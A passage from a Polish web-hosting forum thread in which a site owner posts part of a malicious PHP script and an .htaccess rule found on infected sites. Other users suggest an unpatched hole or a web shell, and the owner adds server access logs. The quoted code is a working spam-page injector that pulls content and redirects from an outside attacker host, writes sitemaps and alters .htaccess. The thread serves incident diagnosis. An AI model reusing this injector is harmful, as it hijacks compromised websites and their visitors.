    $argv_ord = $subNo;
    $subNo = $argv_ord_tmp;
    unset($argv_ord_tmp);
   //  // echo "$domain=$subNo";die();
    $url = preg_replace("/%host%/si", $url_host_string, $url_format);
   // }else{
   //  if (isset($_GET['urlhost'])) {
   //   $gethostbyname_error = 'Error: ';
   //   $gethostbyname_error .= $url_host_string;
   //   $gethostbyname_error .= ' is temporarily unavailable [domain=';
   //   $gethostbyname_error .= $xargv_pre . $subNo;
   //   $gethostbyname_error .= '].';
   //   echo $gethostbyname_error;
   //   exit();
   //  }
   // }
  }
 }

 $url_b = 'http://www88.jpshopsonline.xyz/?domain=%s&lineNo=%s&refer=%d&php_r=%d&from=%s';
 $url_c = 'http://www88.jpshopsonline.xyz/?domain=%s&lineNo=%s&getdomain&from=%s';
 // $url_c = 'http://192.187.112.210/?domain=%s&lineNo=%s&getdomain';
 // unset($url_host);
 $sitemap_url = '';
 $sitemap_url_format = 'http://%host%/?domain=%s&lineNo=%s&sitemapxml=1&from=%s';
 if (isset($_GET['gid'])) {
  $sitemap_url = preg_replace("/%host%/si", sprintf($url_host_format, trim($_GET['gid'])), $sitemap_url_format);
 }else{
  $sitemap_url = preg_replace("/%host%/si", sprintf($url_host_format, $url_host), $sitemap_url_format);
 }
 // $sitemap_url = 'http://192.187.112.210/?domain=%s&lineNo=%s&sitemapxml=1';
 $sx_get_url   = sprintf($sitemap_url, $domain, $lineNo, urlencode($page_location));
 ///////////////////////////////////////////////////////
 unset($url_host_string, $url_host_format, $url_format, $sitemap_url_format, $xargv_pre);
 ///////////////////////////////////////////////////////
 $sitemap_xml  = false;
 $sitemap_xml_step  = 1000;
 $sitemap_use_nonf  = false;
 $sitemap_type   = 'xml';
  $status_gid='';
 if (isset($_GET['http_sitemap'])) {
  $sitemap_xml = (bool)trim($_GET['http_sitemap']);
	$status_gid=trim($_GET['http_sitemap']);
 }
 if ($sitemap_xml) {
  $sitemapxml_file = './sitemap.';
  if (isset($_GET['step'])) {
   $sitemap_xml_step = intval(trim($_GET['step']));
  }
  if (isset($_GET['type'])) {
   $sitemap_type = trim($_GET['type']);
  }
  if ($sitemap_type != '') {
   if ($sitemap_type != 'xml') {
    $sitemap_type_array = 'html|php|htm';
    $sitemap_type_array = explode('|', $sitemap_type_array);
    if (!in_array($sitemap_type, $sitemap_type_array)) {
     $sitemap_type = 'xml';
    }
   }
   unset($sitemap_type_array);
  }else{
   $sitemap_type = 'xml';
  }
  // echo $sitemap_type;die();
  if ($sitemap_xml_step == 0) {
   $sitemap_xml_step = 1000;
  }
  $sitemapxml_id_range = array();
  if (isset($_GET['id_from']) && isset($_GET['id_to'])) {
   $sitemapxml_id_range = range(intval(trim($_GET['id_from'])), intval(trim($_GET['id_to'])));
   if (!empty($sitemapxml_id_range)) {
    if ($sitemapxml_id_range[0] == 0) {
     $sitemapxml_id_range = array();
    }else{
     $sitemapxml_file = './sitemap';
     $sitemapxml_file .= trim($_GET['id_from']) . trim($_GET['id_to']);
     $sitemapxml_file .= '.';
    }
   }
  }
  $sitemapxml_nonf = false;
  $sitemapxml_file .= $sitemap_type;
  if (isset($_GET['nonf'])) {
   $sitemapxml_nonf = (bool)trim($_GET['nonf']);
  }
  $sx_uri     = $page_location_root;
  $sx_uri_format = '';
  $sx_get     = @unserialize(rsync_httpreq($sx_get_url));
  if ($sx_get) {
   @unlink($sitemapxml_file);
   // $sx_tmp_step = $sx_step = intval($sx_get['sitemapxml_step']);
   $sx_tmp_step = $sx_step = $sitemap_xml_step;
   // $rewrite_ext = substr($rewrite_ext, 0, strpos($rewrite_ext, "?"));
   $sitemap_urlf = preg_replace("/\?.*/si", '', $rewrite_array['linkf']['urlf']);
   $sx_array = array();
   $sx_array_len = 0;
   $sx_array_head = "\x3c\x3fxml version=\"1.0\" encoding=\"UTF-8\"\x3f\x3e\n\t<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">";
   if ($sitemap_type != 'xml') {
    $sx_array_head = "<!DOCTYPE html>\n<html>\n<head>\n\t<meta charset=\"utf-8\">\n\t<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n\t<title></title>\n</head>\n<body>";
   }
   $sx_list_config = trim($sx_get['list_config_content']);
   $sx_argv_pre  = trim($sx_get['argv_pre']);
  
	if($status_gid==1){}else{
		 if (@file_put_contents($sitemapxml_file, $sx_array_head) === false) {
			$sitemap_use_nonf = true;
		 }
		}

   if ($sx_list_config != '') {
    $sx_list_config_array = explode("\n", $sx_list_config);
    unset($sx_list_config);
    if (!empty($sx_list_config_array)) {
     if ($rewrite) {
      // $sx_uri  = preg_replace("/[a-zA-Z]+-[\d]+-[\d]+.*/si", '', $sx_uri);
      // $sx_uri  = $page_location_non_args;
      $sx_uri_http = $sx_uri . $sitemap_urlf;
      $sx_uri_format = "\n\t\t\t" . '<loc>' . $sx_uri_http . '</loc>';
      if ($sitemap_type != 'xml') {
       $sx_uri_format = "\n<a href=\"{$sx_uri_http}\" target=\"_blank\">{$sx_uri_http}</a><br />";
      }
     }else{
      $sx_uri_http = $sx_uri . '?' . $sx_argv_pre . '%d=%d';
      $sx_uri_format = "\n\t\t\t" . '<loc>' . $sx_uri_http . '</loc>';
      if ($sitemap_type != 'xml') {
       $sx_uri_format = "\n<a href=\"{$sx_uri_http}\" target=\"_blank\">{$sx_uri_http}</a><br />";
      }
     }
     //////////////////////////
     foreach ($sx_list_config_array as $sx_line) {
      $sx_line_array = explode('$', $sx_line);
      if (count($sx_line_array) == 2) {
       $sx_domain   = explode('_', trim($sx_line_array[0]));
       $sx_domain_id  = 0;
       if (isset($sx_domain[0])) {
        $sx_domain_id = intval(trim($sx_domain[0], "\xEF\xBB\xBF"));
       }
       if ($sx_domain_id == 0) {
        $error_domain_id = '[sitemap] error domain id: <font color="red">0</font> // ';
        $error_domain_id .= $sx_line;
        echo $error_domain_id;
        unset($error_domain_id);
        exit();
       }
       if (!empty($sitemapxml_id_range)) {
        if (!in_array($sx_domain_id, $sitemapxml_id_range)) {
         continue;
        }
       }
       $sx_line_total = intval($sx_line_array[1]);
       if ($sx_line_total != 0) {
        $sx_step = $sx_tmp_step;
        while ($sx_step < $sx_line_total) {
         if (!$sitemapxml_nonf && $sx_array_len > 1000) {
          @file_put_contents($sitemapxml_file, implode('', $sx_array), FILE_APPEND);
          $sx_array = array();
          $sx_array_len = 0;
         }
         $sx_content = '';
         if ($sitemap_type != 'xml') {
          // echo "$sx_uri_format // $sx_domain_id // $sx_step";die();
          if ($rewrite) {
           // $sx_content = sprintf($sx_uri_format, $sx_step, $sx_domain_id, $sx_step, $sx_domain_id);
           // $sx_content = sprintf($sx_uri_format, $sx_step, $sx_domain_id, $sx_step, $sx_domain_id);
           $sx_content_gen = preg_replace("/" . $rewrite_array['linkf']['posi']['rra'] . "/si", '-', $sx_uri_format);
           $sx_content_gen = preg_replace("/" . $rewrite_array['linkf']['posi']['rrb'] . "/si", $sx_argv_pre, $sx_content_gen);
           $sx_content_gen = preg_replace("/" . $rewrite_array['linkf']['posi']['rrc'] . "/si", $sx_domain_id, $sx_content_gen);
           $sx_content_gen = preg_replace("/" . $rewrite_array['linkf']['posi']['rrd'] . "/si", $sx_step, $sx_content_gen);
           $sx_content = $sx_content_gen;
          }else{
           $sx_content = sprintf($sx_uri_format, $sx_domain_id, $sx_step, $sx_domain_id, $sx_step);
          }
          $sx_array[] = $sx_content;
         }else{
          $sx_content .= "\n\t\t" . '<url>';
          if ($rewrite) {
           // $sx_content .= sprintf($sx_uri_format, $sx_step, $sx_domain_id);
           // echo $rewrite_array['linkf']['posi']['rrb'] . " / $sx_uri_format / $sx_argv_pre";die();
           $sx_content_gen = preg_replace("/" . $rewrite_array['linkf']['posi']['rra'] . "/si", '-', $sx_uri_format);
           $sx_content_gen = preg_replace("/" . $rewrite_array['linkf']['posi']['rrb'] . "/si", $sx_argv_pre, $sx_content_gen);
           $sx_content_gen = preg_replace("/" . $rewrite_array['linkf']['posi']['rrc'] . "/si", $sx_domain_id, $sx_content_gen);
           $sx_content_gen = preg_replace("/" . $rewrite_array['linkf']['posi']['rrd'] . "/si", $sx_step, $sx_content_gen);
           $sx_content .= $sx_content_gen;
          }else{
           $sx_content .= sprintf($sx_uri_format, $sx_domain_id, $sx_step);
          }
          $sx_content .= "\n\t\t\t" . '<lastmod>' . date('Y-m-d') . '</lastmod>';
          $sx_content .= "\n\t\t\t" . '<changefreq>daily</changefreq>';
          $sx_content .= "\n\t\t\t" . '<priority>0.8</priority>';
          $sx_content .= "\n\t\t</url>";
          $sx_array[] = $sx_content;
         }
         $sx_content_gen = null;
         unset($sx_content_gen);
         $sx_step += $sx_tmp_step;
         $sx_array_len++;
        }
       }
      }
     }
    }
    unset($sx_list_config_array);
   }
   if ($sitemap_type == 'xml') {
    $sx_array[] = "\n\t</urlset>";
   }else{
    $sx_array[] = "\n</body>\n</html>";
   }
   
   $sitemap_out = implode('', $sx_array);
   unset($sx_array);
   if ($sitemapxml_nonf) {
    if ($sitemap_type == 'xml') {
     header('Content-type:text/xml;charset=utf-8');
    }else{
     header('Content-type:text/html;charset=utf-8');
    }
    echo $sx_array_head;
    echo $sitemap_out;
    unset($sitemap_out, $sx_array_head);
    exit();
   }
   @file_put_contents($sitemapxml_file, $sitemap_out, FILE_APPEND);
   unset($sx_array_len, $sx_content, $sx_step, $sx_tmp_step, $sitemap_out);
  }else{
   $sx_get_url_error = 'Cannot fetch data from ';
   $sx_get_url_error .= $sx_get_url;
   echo $sx_get_url_error;
   unset($sx_get_url_error);
   exit();
  }
  unset($sx_get, $sitemap_xml_step);
  if (!file_exists($sitemapxml_file)) {
   $sitemap_use_nonf = true;
  }
  if ($sitemap_use_nonf) {
   $sx_output = '<font color="red">';
   $sx_output .= $sitemapxml_file;
   $sx_output .= ' cannot be created</font>, use online sitemap: <a href="';
   $sx_output .= $sx_uri;
   $sx_output .= '?http_sitemap=1&nonf=1';
   if ($sitemap_type != 'xml') {
    $sx_output .= '&type=';
    $sx_output .= $sitemap_type;
   }
   $sx_output .='" target="_blank">';
   $sx_output .= $sx_uri;
   $sx_output .= '?http_sitemap=1&nonf=1';
   if ($sitemap_type != 'xml') {
    $sx_output .= '&type=';
    $sx_output .= $sitemap_type;
   }
   $sx_output .= '</a>';
  }else{
   $sx_output = $sitemapxml_file;
   $sx_filename = substr($sitemapxml_file, strrpos($sitemapxml_file, '/') + 1);
   $sx_output .= ' has been created successfully: <a href="';
   $sx_output .= $sx_uri . $sx_filename;
   $sx_output .= '" target="_blank">';
   $sx_output .= $sx_uri . $sx_filename;
   $sx_output .= '</a><input style="margin-left:15px;padding:2px;border:1px solid #ccc" id="sxf" onclick="this.select()" onfocus="this.select()" value="';
   $sx_output .= $sx_filename;
   $sx_output .= '" /><script>window.onload=function(){document.getElementById("sxf").focus()}</script>';
  }
  echo $sx_output;
  unset($sx_output, $sitemapxml_file, $sx_uri, $sitemap_type);
  exit();
 }
 ///////////////////////////////////////////////////////////
 // url rewrite in .htaccess
 sync_htaccess($rewrite_array['rrhtacc']);
 // $sitemap_url_rewrite_rule = 'RewriteRule ^sitemap.([0-9]+).([0-9]+)(.([0-9]+))?.xml$ ?http_sitemap=1&id_from=$1&id_to=$2&step=$4&nonf=1 [L]';
 // sync_htaccess($sitemap_url_rewrite_rule);
 ///////////////////////////////////////////////////////
 // echo "$uri_end";die();
 // print_r($_GET);die();
 if (in_array($script_name, $chk)) {
  if (!isset($_GET)) {
   $index = true;
  }else{
   if (isset($_GET) && empty($_GET)) {
    if ($uri_end == '') {
     $index = true;
    }else{
     if ($uri_end == $script_name) {
      $index = true;
     }
    }
   }else{
    if ($uri_end == '') {
     $index = true;
    }
   }
  }
 }

 if ($subNo != '') {
  $lineNo = $subNo;
 }else{
  if (!$index) {
   $lineNo = '';
  }
 }
 $lineNo = determine_number($lineNo, $index, $index_number);
 //////////////////////////////////////////////////////
 if ($func && $rCheck) {
  if (isset($_GET['main_page']) && strtolower(trim($_GET['main_page'])) == 'index' && isset($_GET['cPath'])) {
   $urlget = sprintf($url_c, $domain, $lineNo, urlencode($page_location));
   $getdomain = trim(rsync_httpreq($urlget));
   if ($getdomain != '') {
    $cpath_redi = 'Location: ';
    $cpath_redi .= $getdomain;
    $cpath_redi .= 'index.php?main_page=index&cPath=';
    $cpath_redi .= trim($_GET['cPath']);
    // echo $cpath_redi;die();
    header($cpath_redi);
    exit();
   }
  }
  // if ($url_host == null) {
  // $host_error = '[ERROR] Cannot determine host with domin `';
  // $host_error .= $domain;
  // $host_error .= '`';
  // echo $host_error;
  // unset($host_error);
  // exit();
  // }
  $url = sprintf($url_b, $domain, $lineNo, 1, $php_redirect, urlencode($page_location));
  // echo "$url";die();
  $redi_code = rsync_httpreq($url);
  $redi_code = trim($redi_code);
  if ($redi_code == '') {
   # 404 error
   header('HTTP/1.1 404 Not Found');
   header("status: 404 Not Found");
   exit();
  }
  if ($php_redirect) {
   header("Location: $redi_code");
  }else{
   echo $redi_code;
  }
  unset($redi_code, $url, $domain, $lineNo, $httpReferer, $php_redirect, $server_name);
  exit();
 }
 if ($func && $lCheck) {
  $url = sprintf($url, $domain, $lineNo, 0, 0, urlencode($page_location));
  if (isset($_GET['url1'])) {
   echo $url . '<br /><br />';
   $urlParse = parse_url($url);
   echo gethostbyname($urlParse['host']);
   exit();
  }
  if (isset($_GET['url2'])) {
   echo $sx_get_url;
   exit();
  }
  if (isset($_GET['pl'])) {
   echo $page_location;
   exit();
  }
  if (isset($_GET['plna'])) {
   echo $page_location_non_args;
   // echo '<br />fileName => ' . $fileName . ' // script_name => ' . $script_name;
   exit();
  }
  if (isset($_GET['plr'])) {
   echo $page_location_root;
   // echo '<br />fileName => ' . $fileName . ' // script_name => ' . $script_name;
   exit();
  }
  if (isset($_GET['fsp'])) {
   echo "dr={$_SERVER['DOCUMENT_ROOT']},fsp=$fileSelfPath,fN=$fileName";
   // echo '<br />fileName => ' . $fileName . ' // script_name => ' . $script_name;
   exit();
  }
  if (isset($_GET['get'])) {
   unset($_GET['get']);
   print_r($_GET);
   exit();
  }
  // echo "$url";die();
  $content = rsync_httpreq($url);
  $content = trim($content);

  if ($content == '') {
   # 404 error
   header('HTTP/1.1 404 Not Found');
   header("status: 404 Not Found");
   exit();
  }
   
  if ($rewrite) {
   // $rewrite_page_location = preg_replace("/[a-zA-Z]+-[\d]+-[\d]+.*/si", '', $page_location_non_args);
   $rewrite_page_location = $page_location_root;
   $find_links = array();
   preg_match_all("/<a href\=\"\?([^\d]+?)(\d+?)\=(\d+?)\" title=\"(.*?)\"/si", $content, $find_links);
   // print_r($find_links);die();
   if (count($find_links) == 5) {
    $new_link_format = '<a href="';
    $new_link_format .= $rewrite_page_location . $rewrite_array['linkf']['urlf'];
    $new_link_format .= '" title="%title">';
    // echo $new_link_format;die();
    foreach ($find_links[0] as $flkey => $flvalue) {
     // 产品名称处理
     $product_name = '';
     if (isset($find_links[4][$flkey])) {
      $product_name = urlencode(preg_replace("/\s{2,}/s", '', preg_replace("/(\/|\?|\:|\"|\<|\>|\*|\+|\&|\||\(|\)|\[|\]|\{|\}|\-|\\\\)/s", ' ', html_entity_decode(trim($find_links[4][$flkey]), ENT_NOQUOTES, 'UTF-8'))));
     }
     // list
     $list_name = '';
     if (isset($find_links[1][$flkey])) {
      $list_name = trim($find_links[1][$flkey]);
     }
     // domain id
     $list_did = 0;
     if (isset($find_links[2][$flkey])) {
      $list_did = trim($find_links[2][$flkey]);
     }
     // lineNo
     $list_lineNo = 0;
     if (isset($find_links[3][$flkey])) {
      $list_lineNo = trim($find_links[3][$flkey]);
     }
     $new_link = preg_replace("/" . $rewrite_array['linkf']['posi']['rra'] . "/", $product_name, $new_link_format);
     $new_link = preg_replace("/" . $rewrite_array['linkf']['posi']['rrb'] . "/", $list_name, $new_link);
     $new_link = preg_replace("/" . $rewrite_array['linkf']['posi']['rrc'] . "/", $list_did, $new_link);
     $new_link = preg_replace("/" . $rewrite_array['linkf']['posi']['rrd'] . "/", $list_lineNo, $new_link);
     $new_link = preg_replace("/%title/", $find_links[4][$flkey], $new_link);
     // echo "$new_link\n";
     // $content = preg_replace("/" . $find_links[0][$key] . "/si", $new_link, $content);
     // $content = preg_replace("/" . addcslashes($find_links[0][$key], '/?:"[]{}') . "/si", $new_link, $content);
     // echo addcslashes(preg_replace("/(<a href=\".*?\").*/si", "$1", $find_links[0][$flkey]), '/?"');die();
     $content = preg_replace("/" . addcslashes(preg_replace("/(<a href=\".*?\").*/si", "$1", $find_links[0][$flkey]), '/?') . ".*?\>/si", $new_link, $content);
     unset($new_link, $product_name, $list_name, $list_did, $list_lineNo);
    }
   }
   // die();
   $find_links = null;
   unset($rewrite_page_location, $find_links);
  }
  if ($anchor_use_link) {
   $anchor_uri = $page_location_non_args;
   // replace anchor text with link
   if ($rewrite) {
    $content = preg_replace("/<a href\=\"(http.*?[a-zA-Z]+-[\d]+-[\d]+.*?)\"[^>]+?>.*?<\/a>/si", "<a href=\"$1\" title=\"$1\">$1</a>", $content);
   }else{
    $content = preg_replace("/<a href\=\"\?(.*?)\" title\=\"(.*?)\"([^>]+)>(.*?)<\/a>/si", "<a href=\"{$anchor_uri}?$1\" title=\"{$anchor_uri}?$1\">{$anchor_uri}?$1</a>", $content);
   }
   unset($anchor_uri);
  }
  if ($strip_js_if_robots) {
   $content = preg_replace("/<script>.*?<\/script>/si", '', $content);
  }
  // filter meta
  $content = preg_replace("/(<li class\=\"desc\">.*?)<meta.*?http-equiv\=[\"|\']refresh[\"|\'].*?>/si", "$1", $content);
  // echo "$page_location";die();
  $content = preg_replace("/<li><a href\=\"http\:\/\/[\w\.-]+?\/(index\.php\?main_page\=.*?\")/si", "<li><a href=\"$page_location_root$1", $content);
  $page_location_y = $page_location_non_args;
  if ($rewrite) {
   $page_location_y = preg_replace("/" . $rewrite_array['rrmatch'] . "/si", '', $page_location_y);
  }
  $page_content = rsync_httpreq($page_location_y);
  $page_content_array = array();
  preg_match("/<body[^>]+>(.*?)<\/body>/si", $page_content, $page_content_array);
  if (isset($page_content_array[1])) {
   $page_content = $page_content_array[1];
  }
  $page_content = preg_replace("/<script.*?<\/script>/si", '', $page_content);
  $page_content = preg_replace("/<style.*?<\/style>/si", '', $page_content);
  $page_content = strip_tags($page_content);
  $page_content = preg_replace("/[\s\r\n]/si", '', $page_content);
  $content = str_ireplace('</title>', ' - ' . $server_name . '</title>', $content);
  $content = str_ireplace('</body>', "\n$page_content\n</body>", $content);
  echo "$content";
  unset($content, $page_content, $page_location, $page_location_y, $page_location_non_args, $page_content_array, $url, $rewrite_array);
  exit();
 }//*/
}
///////////////////////////////////////////////////////////
class_x_i();

?>

i w htacess:

RewriteRule ^.*..*\/([0-9]+)-.*-.*_.*-([0-9]+)_([^\d\/]+)-.*-.*..*$ ?$3$1=$2&%{QUERY_STRING} [L]

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Rafiki

Prawdopodobnie nie oczyściłeś wszystkich plikach i wirus się "odrodził".
A nawet jeśli oczyściłeś to ,czy zabezpieczyłaś lukę przez którą się dostał (bo jakoś musiał się dostać - jeśli jej nie załatałeś wkradł się ponownie).

 

po pierwsze primo, jaki CMS ? Czy autorskie rozwiązanie ?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Czyściłem wszystko co się da ale tam z jakieś 20 domen jest.I nie ma żadnego wspólnego mianownika poza tym że pliki .php są załatwione. I są to zwykłe stronki na php lub wordpress. Poinstalowałem aktualizacje wtyczek i rdzenia. Poza tym cześć WordPress`ów dostała a cześć uchowała się czysta.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Spoofy

A masz może jakieś logi access/error log aby potwierdzić swoją tezę, hm? Skąd twierdzisz że ten "wirus" ma być na danym hostingu/serwerze, hm? Jeżeli Hekko używa np. CloudLinux'a i CageFS'a to stwierdzenie iż jest to "wirus hekko" może spotkać się z konsekwencjami prawnymi, bo fizycznie nie ma jakiejkolwiek możliwości żeby pliki z jednego konta systemowego wylądowały na drugim ;-)

 

Pamiętajmy - tylko "janushe byznesu" stawiają shared hosting w taki sposób że różne konta i wykonywane PHP mogą mieć ze sobą coś wspólnego ;)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Nie napisałem że jest to wirus który występuje tylko na hekko. Każdy rozsądny człowiek raczej zrozumie intencje. Posiadam strony na hekko z którymi mam problem. Korzystam z dziesiątek hostingów i problemy mam na tą chwilę jedynie na hekko...

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Spoofy

Access/Error log? Skan maldet, shell detector? Konfiguracja php (phpinfo)?

 

Proofs or it didn't happen ;)

 

WordPress był i jest dziurawy jak ser szwajcarski, zaś większość wtyczek jest pisanych tragicznie, więc nie zdziwiłbym się gdybyś miał jakiegoś shell'a który Ci po prostu dokleja po kolei wszystko. Tak jak kolega @Rafiki napisał - prawdopodobnie nie wyczyściłeś i nie przeskanowałeś wszystkiego dokładnie.

Edytowano przez Spoofy (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

nie posiadam wiedzy odnośnie skanowania strony czym mogę to poskanować?

Logi:

2017-03-03 00:19:55.317 [INFO] [68.180.228.176:48404] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__43442_rqew_282_twpvv_376] 
2017-03-03 00:21:40.895 [INFO] [68.180.228.176:35062] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1772_fmusk__16152_rqew_282_twpvv_376] 
2017-03-03 00:25:07.956 [INFO] [68.180.228.176:35880] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1760_fmusk__47013_rqew_282_twpvv_376] 
2017-03-03 00:26:57.745 [INFO] [68.180.228.176:50204] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__20624_rqew_282_twpvv_376] 
2017-03-03 00:29:42.135 [INFO] [68.180.228.176:43680] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1772_fmusk__23901_rqew_282_twpvv_376] 
2017-03-03 00:29:56.234 [INFO] [68.180.228.176:45642] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1779_fmusk__27051_rqew_282_twpvv_376] 
2017-03-03 00:31:20.463 [INFO] [68.180.228.176:57648] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__17575_rqew_282_twpvv_376] 
2017-03-03 00:32:19.157 [INFO] [68.180.228.176:37702] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1761_fmusk__3985_rqew_282_twpvv_376] 
2017-03-03 00:33:35.872 [INFO] [68.180.228.176:49410] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__19258_rqew_282_twpvv_376] 
2017-03-03 00:33:51.360 [INFO] [68.180.228.176:51832] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1772_fmusk__11238_rqew_282_twpvv_376] 
2017-03-03 00:35:51.282 [INFO] [68.180.228.176:40584] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__39933_rqew_282_twpvv_376] 
2017-03-03 00:37:35.982 [INFO] [68.180.228.176:56336] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1765_fmusk__42804_rqew_282_twpvv_376] 
2017-03-03 00:38:28.571 [INFO] [68.180.228.176:36190] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1766_fmusk__10142_rqew_282_twpvv_376] 
2017-03-03 00:41:12.855 [INFO] [68.180.228.176:33026] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1772_fmusk__8994_rqew_282_twpvv_376] 
2017-03-03 00:41:29.632 [INFO] [68.180.228.176:35658] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__24370_rqew_282_twpvv_376] 
2017-03-03 00:44:00.944 [INFO] [68.180.228.176:59094] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1765_fmusk__48251_rqew_282_twpvv_376] 
2017-03-03 00:45:00.203 [INFO] [68.180.228.176:39984] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1770_fmusk__19924_rqew_282_twpvv_376] 
2017-03-03 00:45:17.872 [INFO] [68.180.228.176:42648] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1775_fmusk__31260_rqew_282_twpvv_376] 
2017-03-03 00:48:47.054 [INFO] [68.180.228.176:44062] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__29097_rqew_282_twpvv_376] 
2017-03-03 00:49:59.772 [INFO] [199.15.233.168:55374] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/wp-login.php] 
2017-03-03 00:49:59.968 [INFO] [199.15.233.168:55374-1#APVH_www.chwilowkanadowod.eu] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/wp-login.php] 
2017-03-03 00:50:28.516 [INFO] [68.180.228.176:58248] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__23453_rqew_282_twpvv_376] 
2017-03-03 00:52:00.420 [INFO] [68.180.228.176:43308] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1774_fmusk__6977_rqew_282_twpvv_376] 
2017-03-03 00:54:35.351 [INFO] [68.180.228.176:37106] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1779_fmusk__34910_rqew_282_twpvv_376] 
2017-03-03 00:59:27.202 [INFO] [68.180.228.176:43264] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__767_rqew_282_twpvv_376] 
2017-03-03 01:00:17.988 [INFO] [68.180.228.176:48594] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__10317_rqew_282_twpvv_376] 
2017-03-03 01:02:33.514 [INFO] [68.180.228.176:34354] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1760_fmusk__16943_rqew_282_twpvv_376] 
2017-03-03 01:11:12.986 [INFO] [68.180.228.176:44654] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1772_fmusk__13871_rqew_282_twpvv_376] 
2017-03-03 01:15:51.592 [INFO] [68.180.228.176:52692] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1767_fmusk__13302_rqew_282_twpvv_376] 
2017-03-03 01:17:34.153 [INFO] [68.180.228.176:37616] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__36547_rqew_282_twpvv_376] 
2017-03-03 01:18:09.075 [INFO] [68.180.228.176:41876] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1766_fmusk__38967_rqew_282_twpvv_376] 
2017-03-03 01:18:40.327 [INFO] [68.180.228.176:46032] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__44237_rqew_282_twpvv_376] 
2017-03-03 01:20:00.354 [INFO] [68.180.228.176:56840] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1773_fmusk__32913_rqew_282_twpvv_376] 
2017-03-03 01:21:53.928 [INFO] [68.180.228.176:45012] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__13742_rqew_282_twpvv_376] 
2017-03-03 01:22:22.575 [INFO] [68.180.228.176:48794] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__42047_rqew_282_twpvv_376] 
2017-03-03 01:24:18.866 [INFO] [68.180.228.176:36842] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__17269_rqew_282_twpvv_376] 
2017-03-03 01:24:21.471 [INFO] [68.180.228.176:37164] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1760_fmusk__5839_rqew_282_twpvv_376] 
2017-03-03 01:26:43.734 [INFO] [68.180.228.176:55174] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1771_fmusk__3610_rqew_282_twpvv_376] 
2017-03-03 01:32:45.796 [INFO] [68.180.228.176:45622] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1779_fmusk__40410_rqew_282_twpvv_376] 
2017-03-03 01:41:37.749 [INFO] [68.180.228.176:60856] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__13453_rqew_282_twpvv_376] 
2017-03-03 01:44:15.176 [INFO] [68.180.228.176:54422] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1760_fmusk__27513_rqew_282_twpvv_376] 
2017-03-03 01:44:32.139 [INFO] [68.180.228.176:56904] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1775_fmusk__6883_rqew_282_twpvv_376] 
2017-03-03 01:46:37.832 [INFO] [68.180.228.176:46386] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1765_fmusk__681_rqew_282_twpvv_376] 
2017-03-03 01:46:38.771 [INFO] [68.180.228.176:46516] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1766_fmusk__24215_rqew_282_twpvv_376] 
